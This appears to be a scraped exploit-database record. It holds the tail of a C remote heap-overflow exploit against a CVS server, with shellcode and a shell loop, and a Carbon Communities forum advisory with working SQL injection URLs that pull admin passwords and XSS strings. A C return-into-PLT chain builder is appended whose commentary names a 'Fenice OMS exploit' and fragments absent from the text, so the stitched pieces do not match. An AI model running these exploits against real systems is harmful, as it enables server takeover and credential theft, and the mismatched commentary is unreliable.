size)\r\n{\r\nchar *str = malloc(size * 2);\r\nchar *tmp = malloc(size); \r\nint x = 0;\r\nint term = 0;\r\n\r\nif(str == 0 || tmp == 0 || size < (strlen(e1) + strlen(e2) + 4))\r\n{\r\nreturn;\r\n}\r\n\r\nbzero(str, size*2);\r\nbzero(tmp, size);\r\nsprintf(tmp, \"Entry /%s/%s/\", e1, e2);\r\nstrcat(str, tmp);\r\nterm = strlen(str);\r\n\r\nx = term; \r\nwhile(x < (size - 1))\r\n str[x++] = 0xff;\r\n\r\nstrcat(str, \"\\n\");\r\n\r\nstr[term] = 0;\r\n\r\nwrite(s, str, size);\r\nfree(str);\r\n\r\nreturn(0);\r\n}\r\n\r\nint normalize_heap(int sockfd)\r\n{\r\nint i;\r\nchar buff[8192 + 128];\r\n\r\nmemset(buff, 0x0, 8192 + 128);\r\nmemset(buff, 0x62, 8190);\r\nmemcpy(buff, \"Argument \", 9);\r\nstrcat(buff, \"\\n\"); \r\nbuff[72] = 0;\r\n\r\nfor( i = 0 ; i < 128 ; i++)\r\n{\r\nwrite(sockfd, buff, 8191);\r\n} \r\n\r\nmemset(buff, 0x0, 8192 + 128);\r\nmemset(buff, 0x62, 8190);\r\nmemcpy(buff, \"Argument \", 9); \r\nstrcat(buff, \"\\n\");\r\nbuff[65] = 0; \r\n\r\nfor(i = 0 ; i < 64 ; i++)\r\n{\r\nwrite(sockfd, buff, 8191);\r\n}\r\n\r\nmemset(buff, 0x0, 8192 + 128);\r\n memset(buff, 0x62, 8190);\r\n memcpy(buff, \"Argument \", 9);\r\n strcat(buff, \"\\n\"); \r\nbuff[44] = 0;\r\n\r\nfor(i = 0 ; i < 32 ; i++)\r\n{\r\nwrite(sockfd, buff, 8191);\r\n}\r\nmemset(buff, 0x0, 8192 + 128);\r\n memset(buff, 0xff, 8193);\r\n memcpy(buff, \"Argument \", 9);\r\n strcat(buff, \"\\n\"); \r\n\r\nwrite(sockfd, buff, 8194);\r\n}\r\n\r\nint correctly_fill_hole(int sockfd, int fill)\r\n{\r\nint chunk_size, chunk_size2;\r\nint num_chunks;\r\nint leftover, i = 0;\r\nchar buf[256];\r\nchar pad[1024];\r\nchar buff[2048];\r\nunsigned long addr = RET;\r\nchar addrbuf[4096];\r\n\r\nchunk_size = (1024 + word_size);\r\nnum_chunks = (fill / chunk_size);\r\nleftover = (fill % chunk_size);\r\n\r\nmemset(pad, 0x0, 1024);\r\nmemset(pad, 0x88, ((1024 - 8) / 2));\r\nmemset(buff, 0x0, 2048);\r\n\r\n /* The exploit will almost certainly fail if leftover == 0\r\n * however in theory this should never actually 
happen.\r\n */\r\nif(leftover == 0)\r\n{\r\nfor(i = 0; i < num_chunks && fill > 0; i++)\r\n{\r\n do_sized_entry(sockfd, pad, pad, fill - (1024 + word_size));\r\n fill -= (1024 + word_size);\r\n}\r\n}\r\nelse\r\n{\r\nfor(i = 0; i < (num_chunks -2) && fill > 0; i++)\r\n{\r\n do_sized_entry(sockfd, pad, pad, fill - (1024 + word_size));\r\n fill -= (1024 + word_size);\r\n}\r\nchunk_size2 = (chunk_size * 2 + leftover); \r\nROUND(chunk_size2);\r\nmemset(buff, 0x0, 2048);\r\nmemset(buff, 0xff, (chunk_size2 - 8) / 2);\r\nmemset(addrbuf, 0x0, sizeof(addrbuf)); \r\nfor(i = 0 ; i < (((chunk_size2 - 8) / 2) -4) ; i += 4) \r\n *(int *)&addrbuf[i] = htonl(RET);\r\n\r\nmemcpy(buff+1, addrbuf, strlen(addrbuf)); \r\ndo_sized_entry(sockfd, buff, buff, 4096);\r\n}\r\n\r\nmemset(buff, 0x0, 2048);\r\nmemset(buff, 0xff, 34);\r\n\r\nmemset(addrbuf, 0x0, sizeof(addrbuf));\r\nfor(i = 0; i < 28; i+=4)\r\n *(int *)&addrbuf[i] = htonl(RET);\r\n\r\nmemcpy(buff+7, addrbuf, strlen(addrbuf));\r\n\r\ndo_sized_entry(sockfd, buff, buff, 97);\r\n}\r\n\r\nint do_ismodified(int s, char *e1)\r\n{ \r\nchar *str = (char *) malloc(100000);\r\nint x = 0, term = 0;\r\n\r\n bzero(str, 100000);\r\n\r\nsprintf(str,\"Is-modified %s\\n\", e1);\r\n\r\nzwrite(str, strlen(str), s);\r\nzflush(s); \r\n\r\nfree(str);\r\n\r\nreturn 0;\r\n}\r\n\r\nint do_argument(int sockfd)\r\n{\r\nchar *exp;\r\n\r\nexp = (char *) malloc(20000);\r\n\r\nmemset(exp, 0x0, 20000);\r\nmemset(exp, 0x69, 19680 + strlen(\"Argument \"));\r\n\r\nmemcpy(exp, \"Argument \", strlen(\"Argument \"));\r\n\r\nexp[19680 + strlen(\"Argument \")] = '\\n';\r\n\r\nwrite(sockfd, exp, strlen(exp));\r\n\r\nreturn(0);\r\n}\r\n\r\nint do_resize(int sockfd)\r\n{\r\nchar buffer[256];\r\nint x = 0;\r\nmemset(buffer, 0x0, 256);\r\nmemset(buffer, 0xff, 255);\r\n\r\nbuffer[254] = '\\n';\r\n\r\nmemcpy(buffer, \"Argumentx \", strlen(\"Argumentx \"));\r\n\r\nbuffer[74 + 44] = 0;\r\n\r\nzwrite(buffer, 255, sockfd);\r\nzflush(sockfd);\r\n}\r\n\r\nint do_overflow(int 
sockfd)\r\n{\r\nchar buffer[20000];\r\nint i = 0;\r\n\r\nmemset(buffer, 0x0, 20000);\r\nmemset(buffer, 0x42, 19782);\r\n\r\nfor(i = 0 ; i < 19780-8; i+=4)\r\n *(unsigned int *)&buffer[i] = htonl(retaddr);\r\n \r\nfor(i = 0; i < 19600; i+=4)\r\n *(unsigned int *)&buffer[i] = htonl(NOP); \r\n \r\n memcpy(buffer+19000, shellcode, strlen(shellcode));\r\n\r\nmemcpy(buffer, \"Argument \", strlen(\"Argument \"));\r\nbuffer[19781] = '\\012';\r\n\r\nzwrite(buffer, 19782, sockfd);\r\nzflush(sockfd);\r\n}\r\n\r\nint work_around_zlib_bug(int sockfd)\r\n{\r\nchar buffer[4096];\r\nchar data[64];\r\n\r\nmemset(data, 0x0, 64);\r\nmemset(data, 0x42, 32);\r\n\r\nmemset(buffer, 0x0, 4096);\r\nmemset(buffer, 0x42, 4000);\r\n\r\nsprintf(buffer, \"Entry /%s/%s/\", data, data);\r\n\r\nbuffer[2999] = '\\n';\r\n\r\nzwrite(buffer, 3000, sockfd);\r\nzflush(sockfd);\r\n} \r\n\r\nunsigned char auth_shifts[] ={\r\n 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,\r\n 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31,\r\n 114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87,\r\n 111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105,\r\n 41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35,\r\n 125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56,\r\n 36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48,\r\n 58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223,\r\n 225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190,\r\n 199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193,\r\n 174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,\r\n 207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,\r\n 192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,\r\n 227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,\r\n 182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,\r\n 243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 };\r\n\r\nchar 
*scramble(char * str)\r\n{\r\nint i;\r\n char * s;\r\n \r\n s = (char *) malloc (strlen (str) + 3);\r\n memset(s, '\\0', strlen(str) + 3);\r\n *s = 'A';\r\n for (i = 1; str[i - 1]; i++)\r\n s[i] = auth_shifts[(unsigned char)(str[i - 1])];\r\n return (s);\r\n}\r\n\r\nint usage(char *name)\r\n{\r\nprintf(\"usage: %s [options]\\n\", name);\r\n printf(\"Options:\\n\");\r\n printf(\" -t Desired target\\n\");\r\n printf(\" -r CVS root\\n\");\r\n printf(\" -u CVS user\\n\");\r\n printf(\" -p Password\\n\");\r\n printf(\" -h Targeted host\\n\"); \r\n printf(\" -P Port running CVS\\n\"); \r\n \r\n printf(\"\\nAvailable targets:\\n\"); \r\n for (target = 0; serve[target].name != NULL; target++) \r\n printf(\"[%i] - %s\\n\", target, serve[target].name); \r\n exit(0);\r\n}\r\n\r\nint do_shell(int sockfd)\r\n{\r\nwhile(1)\r\n {\r\n fd_set fds;\r\n FD_ZERO(&fds);\r\n FD_SET(0,&fds);\r\n FD_SET(sockfd,&fds);\r\n if(select(FD_SETSIZE,&fds,NULL,NULL,NULL))\r\n {\r\n int cnt;\r\n char buf[1024];\r\n if(FD_ISSET(0,&fds))\r\n {\r\n if((cnt=read(0,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(sockfd,buf,cnt);\r\n }\r\n if(FD_ISSET(sockfd,&fds))\r\n {\r\n if((cnt=read(sockfd,buf,1024))<1)\r\n {\r\n if(errno==EWOULDBLOCK||errno==EAGAIN)\r\n continue;\r\n else\r\n break;\r\n }\r\n write(1,buf,cnt);\r\n }\r\n }\r\n } \r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\nint i, sockfd, len, result,x;\r\n char c;\r\nstruct sockaddr_in addr;\r\nstruct hostent *hostinfo;\r\n\r\nif(argc == 1)\r\n{\r\n usage(argv[0]); \r\n }\r\n\r\nport = CVS_PORT; \r\n while((c = getopt(argc, argv, \"t:r:u:d:p:h:\")) != EOF)\r\n { \r\n switch(c) \r\n { \r\n case 't': \r\n target = atoi(optarg); \r\n break; \r\n case 'r': \r\n root = strdup(optarg); \r\n reposit = strdup(optarg); \r\n break; \r\n case 'u': \r\n user = strdup(optarg); \r\n break; \r\n case 'd': \r\n directory = strdup(optarg); \r\n break;\r\n case 'p':\r\n pass = 
strdup(optarg);\r\n break;\r\n case 'h':\r\n host = strdup(optarg);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n } \r\n}\r\n\r\nhostinfo = gethostbyname(host);\r\nif(!hostinfo)\r\n{\r\nperror(\"gethostbyname()\");\r\nexit(0);\r\n}\r\n\r\nsockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n\r\naddr.sin_family = AF_INET;\r\naddr.sin_port = htons(port);\r\naddr.sin_addr = *(struct in_addr *)*hostinfo -> h_addr_list;\r\nlen = sizeof(addr);\r\n\r\nprintf(\"Attacking %s running %s\\n\", host, serve[target].name);\r\nprintf(\"[\");\r\nfflush(stdout);\r\n\r\nretaddr = serve[target].retadd;\r\n\r\n while(1)\r\n {\r\nsockfd = socket(AF_INET, SOCK_STREAM, 0); \r\nresult = connect(sockfd, (struct sockaddr *)&addr, len);\r\nif(result == -1)\r\n{\r\nperror(\"connect()\");\r\nexit(0);\r\n}\r\n\r\ndo_auth(sockfd);\r\ntimeout_read(sockfd, buf, sizeof(buf)-1, 3); \r\ndo_root(sockfd);\r\n\r\nnormalize_heap(sockfd);\r\n\r\ndo_argument(sockfd);\r\n \r\n fill_size = 19680;\r\n\r\nmemset(entry1, 0x41, 60);\r\nmemset(entry2, 0x42, 60);\r\nmemset(entry3, 0x43, 60);\r\n\r\ndo_sized_entry(sockfd, entry1, entry1, fill_size - (128+word_size) );\r\n fill_size -= (128 + word_size);\r\n do_sized_entry(sockfd, entry2, entry2, fill_size - (128+word_size) );\r\n fill_size -= (128 + word_size);\r\n do_sized_entry(sockfd, entry3, entry3, fill_size - (128+word_size) );\r\n fill_size -= (128 + word_size);\r\n \r\ncorrectly_fill_hole(sockfd, fill_size - (64 + word_size));\r\n \r\ndo_compression(sockfd);\r\n\r\nlen1 = ( 5 + 4 + 16); \r\n len2 = ( 144 + 8 + 5 + 1);\r\nlen3 = ( 144 + 8 + 128 + 8 + 5 + 0);\r\n\r\nfor(i = 0; i < len1; i++)\r\n do_ismodified(sockfd, entry1);\r\n\r\nfor(i = 0; i < len2; i++)\r\n do_ismodified(sockfd, entry2);\r\n\r\nfor(i = 0; i < len3; i++)\r\n do_ismodified(sockfd, entry3);\r\n\r\nwork_around_zlib_bug(sockfd);\r\n\r\ndo_resize(sockfd);\r\n\r\n do_overflow(sockfd);\r\n\r\nprintf(\".\");\r\nfflush(stdout);\r\n\r\nwhile(1)\r\n{\r\n result = timeout_read(sockfd, buf, 4, 5);\r\n 
if(result == -1 || result == 0)\r\n {\r\nbreak;\r\n }\r\n if(result == -2)\r\n {\r\nprintf(\"\\n Timeout... trying for shell\\n\"); \r\ndo_shell(sockfd);\r\nbreak;\r\n } \r\n/* Maybe use strstr and a larger read buffer here ? */\r\n if(strncmp(buf, \"caca\", 4) == 0)\r\n {\r\nprintf(\"]\\n\");\r\nprintf(\"[+] [email\u00a0protected] With retaddr = 0x%x\\n\", retaddr);\r\ndo_shell(sockfd);\r\nexit(0);\r\n }\r\n}\r\n\r\nchange += 12000;\r\n\r\n if(oflip == 0)\r\n {\r\n retaddr = serve[target].retadd + change;\r\n oflip = 1;\r\n }\r\n else if(oflip == 1)\r\n {\r\n retaddr = serve[target].retadd - change;\r\n oflip = 0;\r\n }\r\n\r\nclose(sockfd);\r\n } \r\n}\r\n\r \n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8399"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.\r\nTrashbin plugin for Wordpress: crossite scripting.", "modified": "2008-04-16T00:00:00", "published": "2008-04-16T00:00:00", "id": "SECURITYVULNS:VULN:8911", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8911", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "########################## www.BugReport.ir #######################################\r\n#\r\n# AmnPardaz Security Research Team\r\n#\r\n# Title: Multiple Vulnerabilities in Carbon Communities forum. \r\n# Vendor: www.carboncommunities.com\r\n# Vulnerable Version: 2.4 and prior versions\r\n# Exploit: Available\r\n# Impact: High\r\n# Fix: N/A\r\n# Original Advisory: http://bugreport.ir/index.php?/35\r\n###################################################################################\r\n\r\n\r\n####################\r\n1. 
Description:\r\n####################\r\nCarbon Communities is a high powered, fully scalable, and highly customizable online portal, message\r\nboards/ bulletin board, discussion hub, Private messaging, Event Calendars, Emails and chat software\r\nrolled into one.\r\n\r\n####################\r\n2. Vulnerability:\r\n####################\r\n 2.1. There is a SQL Injection in "events.asp?id=[Injection]". By using it, attacker can gain\r\nusernames and passwords.\r\n 2.1.1. POC:\r\n Check exploits section.\r\n 2.2. There is a SQL Injection in "getpassword.asp". By using it, attacker can send any\r\npassword to his/her email address.(exploit available)\r\n 2.2.1. POC:\r\n Check exploits section.\r\n 2.3. There is a SQL Injection in "option_Update.asp". By using it, attacker can update member\r\ninfo.(exploit available)\r\n 2.3.1. POC:\r\n Check exploits section.\r\n 2.4. There are some XSS in "login.asp" and "member_send.asp".\r\n 2.4.1. POC:\r\n /login.asp?Redirect='><script>alert('XSS')</script><fake a='\r\n /member_send.asp?OrderBy='><script>alert('XSS')</script><fake a='\r\n####################\r\n3. Exploits:\r\n####################\r\n \r\n Original Exploit URL: http://bugreport.ir/index.php?/35/exploit\r\n\r\n 3.1. Attacker can gain usernames and passwords:\r\n -------------\r\n http://[CarbonCommunitiesURL]/events.asp?ID=-1 union all select 1,1,1,'Username=\r\n'%2bmember_name%2b'<br>Password= '%2bmember_password,1,1,1,1,1,1,1 from tbl_Members where member_name\r\n= 'admin'\r\n -------------\r\n 3.2. 
Attacker can send any password to his/her email address:\r\n -------------\r\n <script language="javascript">\r\n function check(){\r\n document.getElementById("UserName").value = "1' or\r\nuCase(Member_Name)='"+ document.getElementById("UserName").value\r\n }\r\n </script>\r\n <form action="http://[CarbonCommunitiesURL]/getpassword.asp" method="post"\r\nonsubmit="check()">\r\n UserName: <input type="text" name="UserName" id="UserName" value="default" size="100"\r\n/>\r\n <br />\r\n EMail: <input type="text" name="EMail" value="Your Email Address" size="100" />\r\n <br />\r\n <input type="submit" />\r\n </form>\r\n -------------\r\n 3.3. Attacker can update member info.:\r\n -------------\r\n <form action="http://[CarbonCommunitiesURL]/option_Update.asp?Action=edit"\r\nmethod="post">\r\n ID<input type="text" name="ID" value="1"/>\r\n <br />\r\n Member_Cookies<input type="text" name="Member_Cookies" value="Yes" />\r\n <br />\r\n Member_SystemCookies<input type="text" name="Member_SystemCookies" value="Yes" />\r\n <br />\r\n Member_Center<input type="text" name="Member_Center" value="1" />\r\n <br />\r\n Member_EmailTheadResponse<input type="text" name="Member_EmailTheadResponse"\r\nvalue="1" />\r\n <br />\r\n Member_EmailPostResponse<input type="text" name="Member_EmailPostResponse" value="1"\r\n/>\r\n <br />\r\n Member_WeekStart<input type="text" name="Member_WeekStart" value="0" />\r\n <br />\r\n Member_ThreadDays<input type="text" name="Member_ThreadDays" value="0" />\r\n <br />\r\n Member_ThreadView<input type="text" name="Member_ThreadView" value="0" />\r\n <br />\r\n Member_Invisible<input type="text" name="Member_Invisible" value="1" />\r\n <br />\r\n Member_HiddenEmail<input type="text" name="Member_HiddenEmail" value="0" />\r\n <br />\r\n Member_ReceivePM<input type="text" name="Member_ReceivePM" value="1" />\r\n <br />\r\n Member_PMEmailNotice<input type="text" name="Member_PMEmailNotice" value="1" />\r\n <br />\r\n Member_PMPopup<input type="text" 
name="Member_PMPopup" value="1" />\r\n <br />\r\n Member_Newsletter<input type="text" name="Member_Newsletter" value="0" />\r\n <br />\r\n Member_TimeZone<input type="text" name="Member_TimeZone" value="0" />\r\n <br />\r\n Member_DefaultColor<input type="text" name="Member_DefaultColor" value="1" />\r\n <br />\r\n <input type="submit" />\r\n </form>\r\n -------------\r\n####################\r\n4. Solution:\r\n####################\r\n Edit the source code to ensure that inputs are properly sanitised.\r\n####################\r\n- Credit :\r\n####################\r\nAmnPardaz Security Research & Penetration Testing Group\r\nContact: admin[4t}bugreport{d0t]ir\r\nWwW.BugReport.ir\r\nWwW.AmnPardaz.com", "modified": "2008-04-16T00:00:00", "published": "2008-04-16T00:00:00", "id": "SECURITYVULNS:DOC:19680", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19680", "title": "Carbon Communities forum Multiple Vulnerabilities.", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}
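The Fenice OMS exploit above is a compact illustration of return-into-PLT chaining against exec-shield: the stack is non-executable and the libraries are randomized, but a non-PIE executable's own PLT, .rodata and .data stay at fixed addresses, so the exploit carries no shellcode at all. Every `__GOGOSSING` group lays down one frame `[strcpy@plt][pop;pop;ret][dst][src]`: `strcpy@plt` copies a short NUL-terminated string that already exists somewhere in the binary (`"us"`, `"r/"`, `"bin"`, `"term"`, single digits) into a scratch area in .data, then returns into the `__do_global_ctors_aux` epilogue gadget, which must pop both strcpy arguments before its `ret` so that the next frame is reached (the exploit's `MOVE_ESP` comment shows only `pop %ebx`, but the frame layout requires two pops, consistent with the "12byte" note). Each copy also writes a terminating NUL that the following fragment overwrites, and a final copy of an all-zero word closes the string. The table has no `"."`, which is consistent with the exploit formatting the xhost address as one decimal integer rather than dotted quad. The program below is an added example, not code from the exploit or from the Fenice project: it generalizes the hand-laid sequence into a greedy longest-match chain builder over a fragment table, then runs the chain through a small simulator with real strcpy semantics to check what ends up in .data. All addresses and the fragment table are constructed for the example (they echo the exploit's defines, but the simulator only needs them to be distinct), and `build_chain`, `run_chain`, `assemble_and_verify` and `chain_words` are names chosen here.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed addresses (hypothetical, chosen to echo the exploit's defines; the
 * simulator only needs them to be distinct). In a non-PIE binary all three stay
 * fixed even when exec-shield randomizes the library mappings. */
#define STRCPY_PLT  0x08048ffcu  /* strcpy@plt */
#define POP_POP_RET 0x080569e5u  /* pop %ebx ; pop %ebp ; ret: lifts both strcpy arguments */
#define DATA_LOC    0x0805af4cu  /* writable .data/.bss scratch area the string is built in */
#define DATA_SIZE   256

struct fragment { uint32_t addr; const char *str; };

/* Constructed table of NUL-terminated strings assumed to sit at fixed addresses in
 * the executable. The empty string stands for an all-zero word (the terminator). */
static const struct fragment frags[] = {
    {0x08055acb, "/"},   {0x0804875d, "us"},  {0x080585ce, "r/"}, {0x08048df3, "X"},
    {0x0804a572, "R"},   {0x0804882c, "bin"}, {0x08048e33, "x"},  {0x08056a33, "term"},
    {0x080584b8, "-di"}, {0x08057abb, ":"},   {0x08053285, "0"},  {0x0804ef17, "1"},
    {0x0804b37b, "2"},   {0x0804d622, "3"},   {0x0804e583, "4"},  {0x080554d7, "5"},
    {0x08052341, "6"},   {0x0804d14a, "7"},   {0x08048db3, "8"},  {0x080516bb, "9"},
    {0x0805afbe, ""},
};
static const size_t nfrags = sizeof frags / sizeof frags[0];

/* Index of the longest non-empty fragment that is a prefix of s, or -1 if none is. */
static int best_fragment(const char *s)
{
    int best = -1;
    size_t bestlen = 0, slen = strlen(s);
    for (size_t i = 0; i < nfrags; i++) {
        size_t n = strlen(frags[i].str);
        if (n > bestlen && n <= slen && memcmp(frags[i].str, s, n) == 0) {
            best = (int)i;
            bestlen = n;
        }
    }
    return best;
}

/* Emit [strcpy@plt][pop;pop;ret][dst][src] frames that assemble `target` at `dst`,
 * closing with a copy of the zero word. Returns the number of 32-bit words written,
 * or -1 when some suffix has no fragment or the chain does not fit in max_words. */
int build_chain(const char *target, uint32_t dst, uint32_t *chain, size_t max_words)
{
    size_t w = 0;
    uint32_t off = 0;
    const char *rest = target;
    for (;;) {
        int f = -1;
        if (*rest) {
            f = best_fragment(rest);
        } else {                       /* string complete: find the zero word */
            for (size_t i = 0; i < nfrags; i++)
                if (frags[i].str[0] == '\0') f = (int)i;
        }
        if (f < 0 || w + 4 > max_words) return -1;
        chain[w++] = STRCPY_PLT;       /* return into strcpy@plt ... */
        chain[w++] = POP_POP_RET;      /* ... which returns into pop;pop;ret */
        chain[w++] = dst + off;        /* strcpy arg 1: where the fragment lands */
        chain[w++] = frags[f].addr;    /* strcpy arg 2: the fragment inside the binary */
        if (!*rest) return (int)w;     /* terminator frame emitted */
        size_t n = strlen(frags[f].str);
        off += (uint32_t)n;
        rest += n;
    }
}

/* Simulate the chain: each frame performs strcpy(dst, src) including the NUL, into
 * `data`, which models DATA_LOC..DATA_LOC+DATA_SIZE. Returns 0 when every frame is
 * well formed and stays inside the scratch area, -1 otherwise. */
int run_chain(const uint32_t *chain, int nwords, char data[DATA_SIZE])
{
    memset(data, 0xAA, DATA_SIZE);     /* poison: the chain must place every byte itself */
    if (nwords < 0 || nwords % 4) return -1;
    for (int i = 0; i < nwords; i += 4) {
        if (chain[i] != STRCPY_PLT || chain[i + 1] != POP_POP_RET) return -1;
        uint32_t dst = chain[i + 2], src = chain[i + 3];
        const char *s = NULL;
        for (size_t f = 0; f < nfrags; f++)
            if (frags[f].addr == src) s = frags[f].str;
        if (!s) return -1;                                  /* src is not a known string */
        size_t n = strlen(s) + 1;                           /* strcpy copies the NUL too */
        if (dst < DATA_LOC || dst + n > DATA_LOC + DATA_SIZE) return -1;
        memcpy(data + (dst - DATA_LOC), s, n);
    }
    return 0;
}

/* Words the chain for `target` occupies, or -1 if it cannot be assembled. */
int chain_words(const char *target)
{
    uint32_t chain[128];
    return build_chain(target, DATA_LOC, chain, 128);
}

/* 1 if the simulated .data holds exactly `target` after the chain runs, else 0. */
int assemble_and_verify(const char *target)
{
    uint32_t chain[128];
    char data[DATA_SIZE];
    int n = build_chain(target, DATA_LOC, chain, 128);
    if (n < 0 || run_chain(chain, n, data) != 0) return 0;
    return strcmp(data, target) == 0;
}

int main(void)
{
    const char *argv0 = "/usr/X11R6/bin/xterm";
    uint32_t chain[128];
    int n = build_chain(argv0, DATA_LOC, chain, 128);
    printf("%s -> %d frames, %d payload bytes\n", argv0, n / 4, n * 4);
    for (int i = 0; i < n; i += 4)
        printf("  %08x %08x dst=%08x src=%08x\n", chain[i], chain[i + 1], chain[i + 2], chain[i + 3]);
    printf("verified: %s\n", assemble_and_verify(argv0) ? "yes" : "no");
    printf("\"82.82.82.82:0\" buildable: %s\n", chain_words("82.82.82.82:0") < 0 ? "no (no '.' fragment)" : "yes");
    return 0;
}
```

Build with `cc -std=c99 -Wall chain.c -o chain`. The greedy builder reproduces the exploit's thirteen fragments plus terminator for the xterm path (56 words), succeeds for the abbreviated `-di` option and for a decimal-encoded address, and fails cleanly for `-display` or a dotted quad, which is exactly the constraint that shaped the original payload.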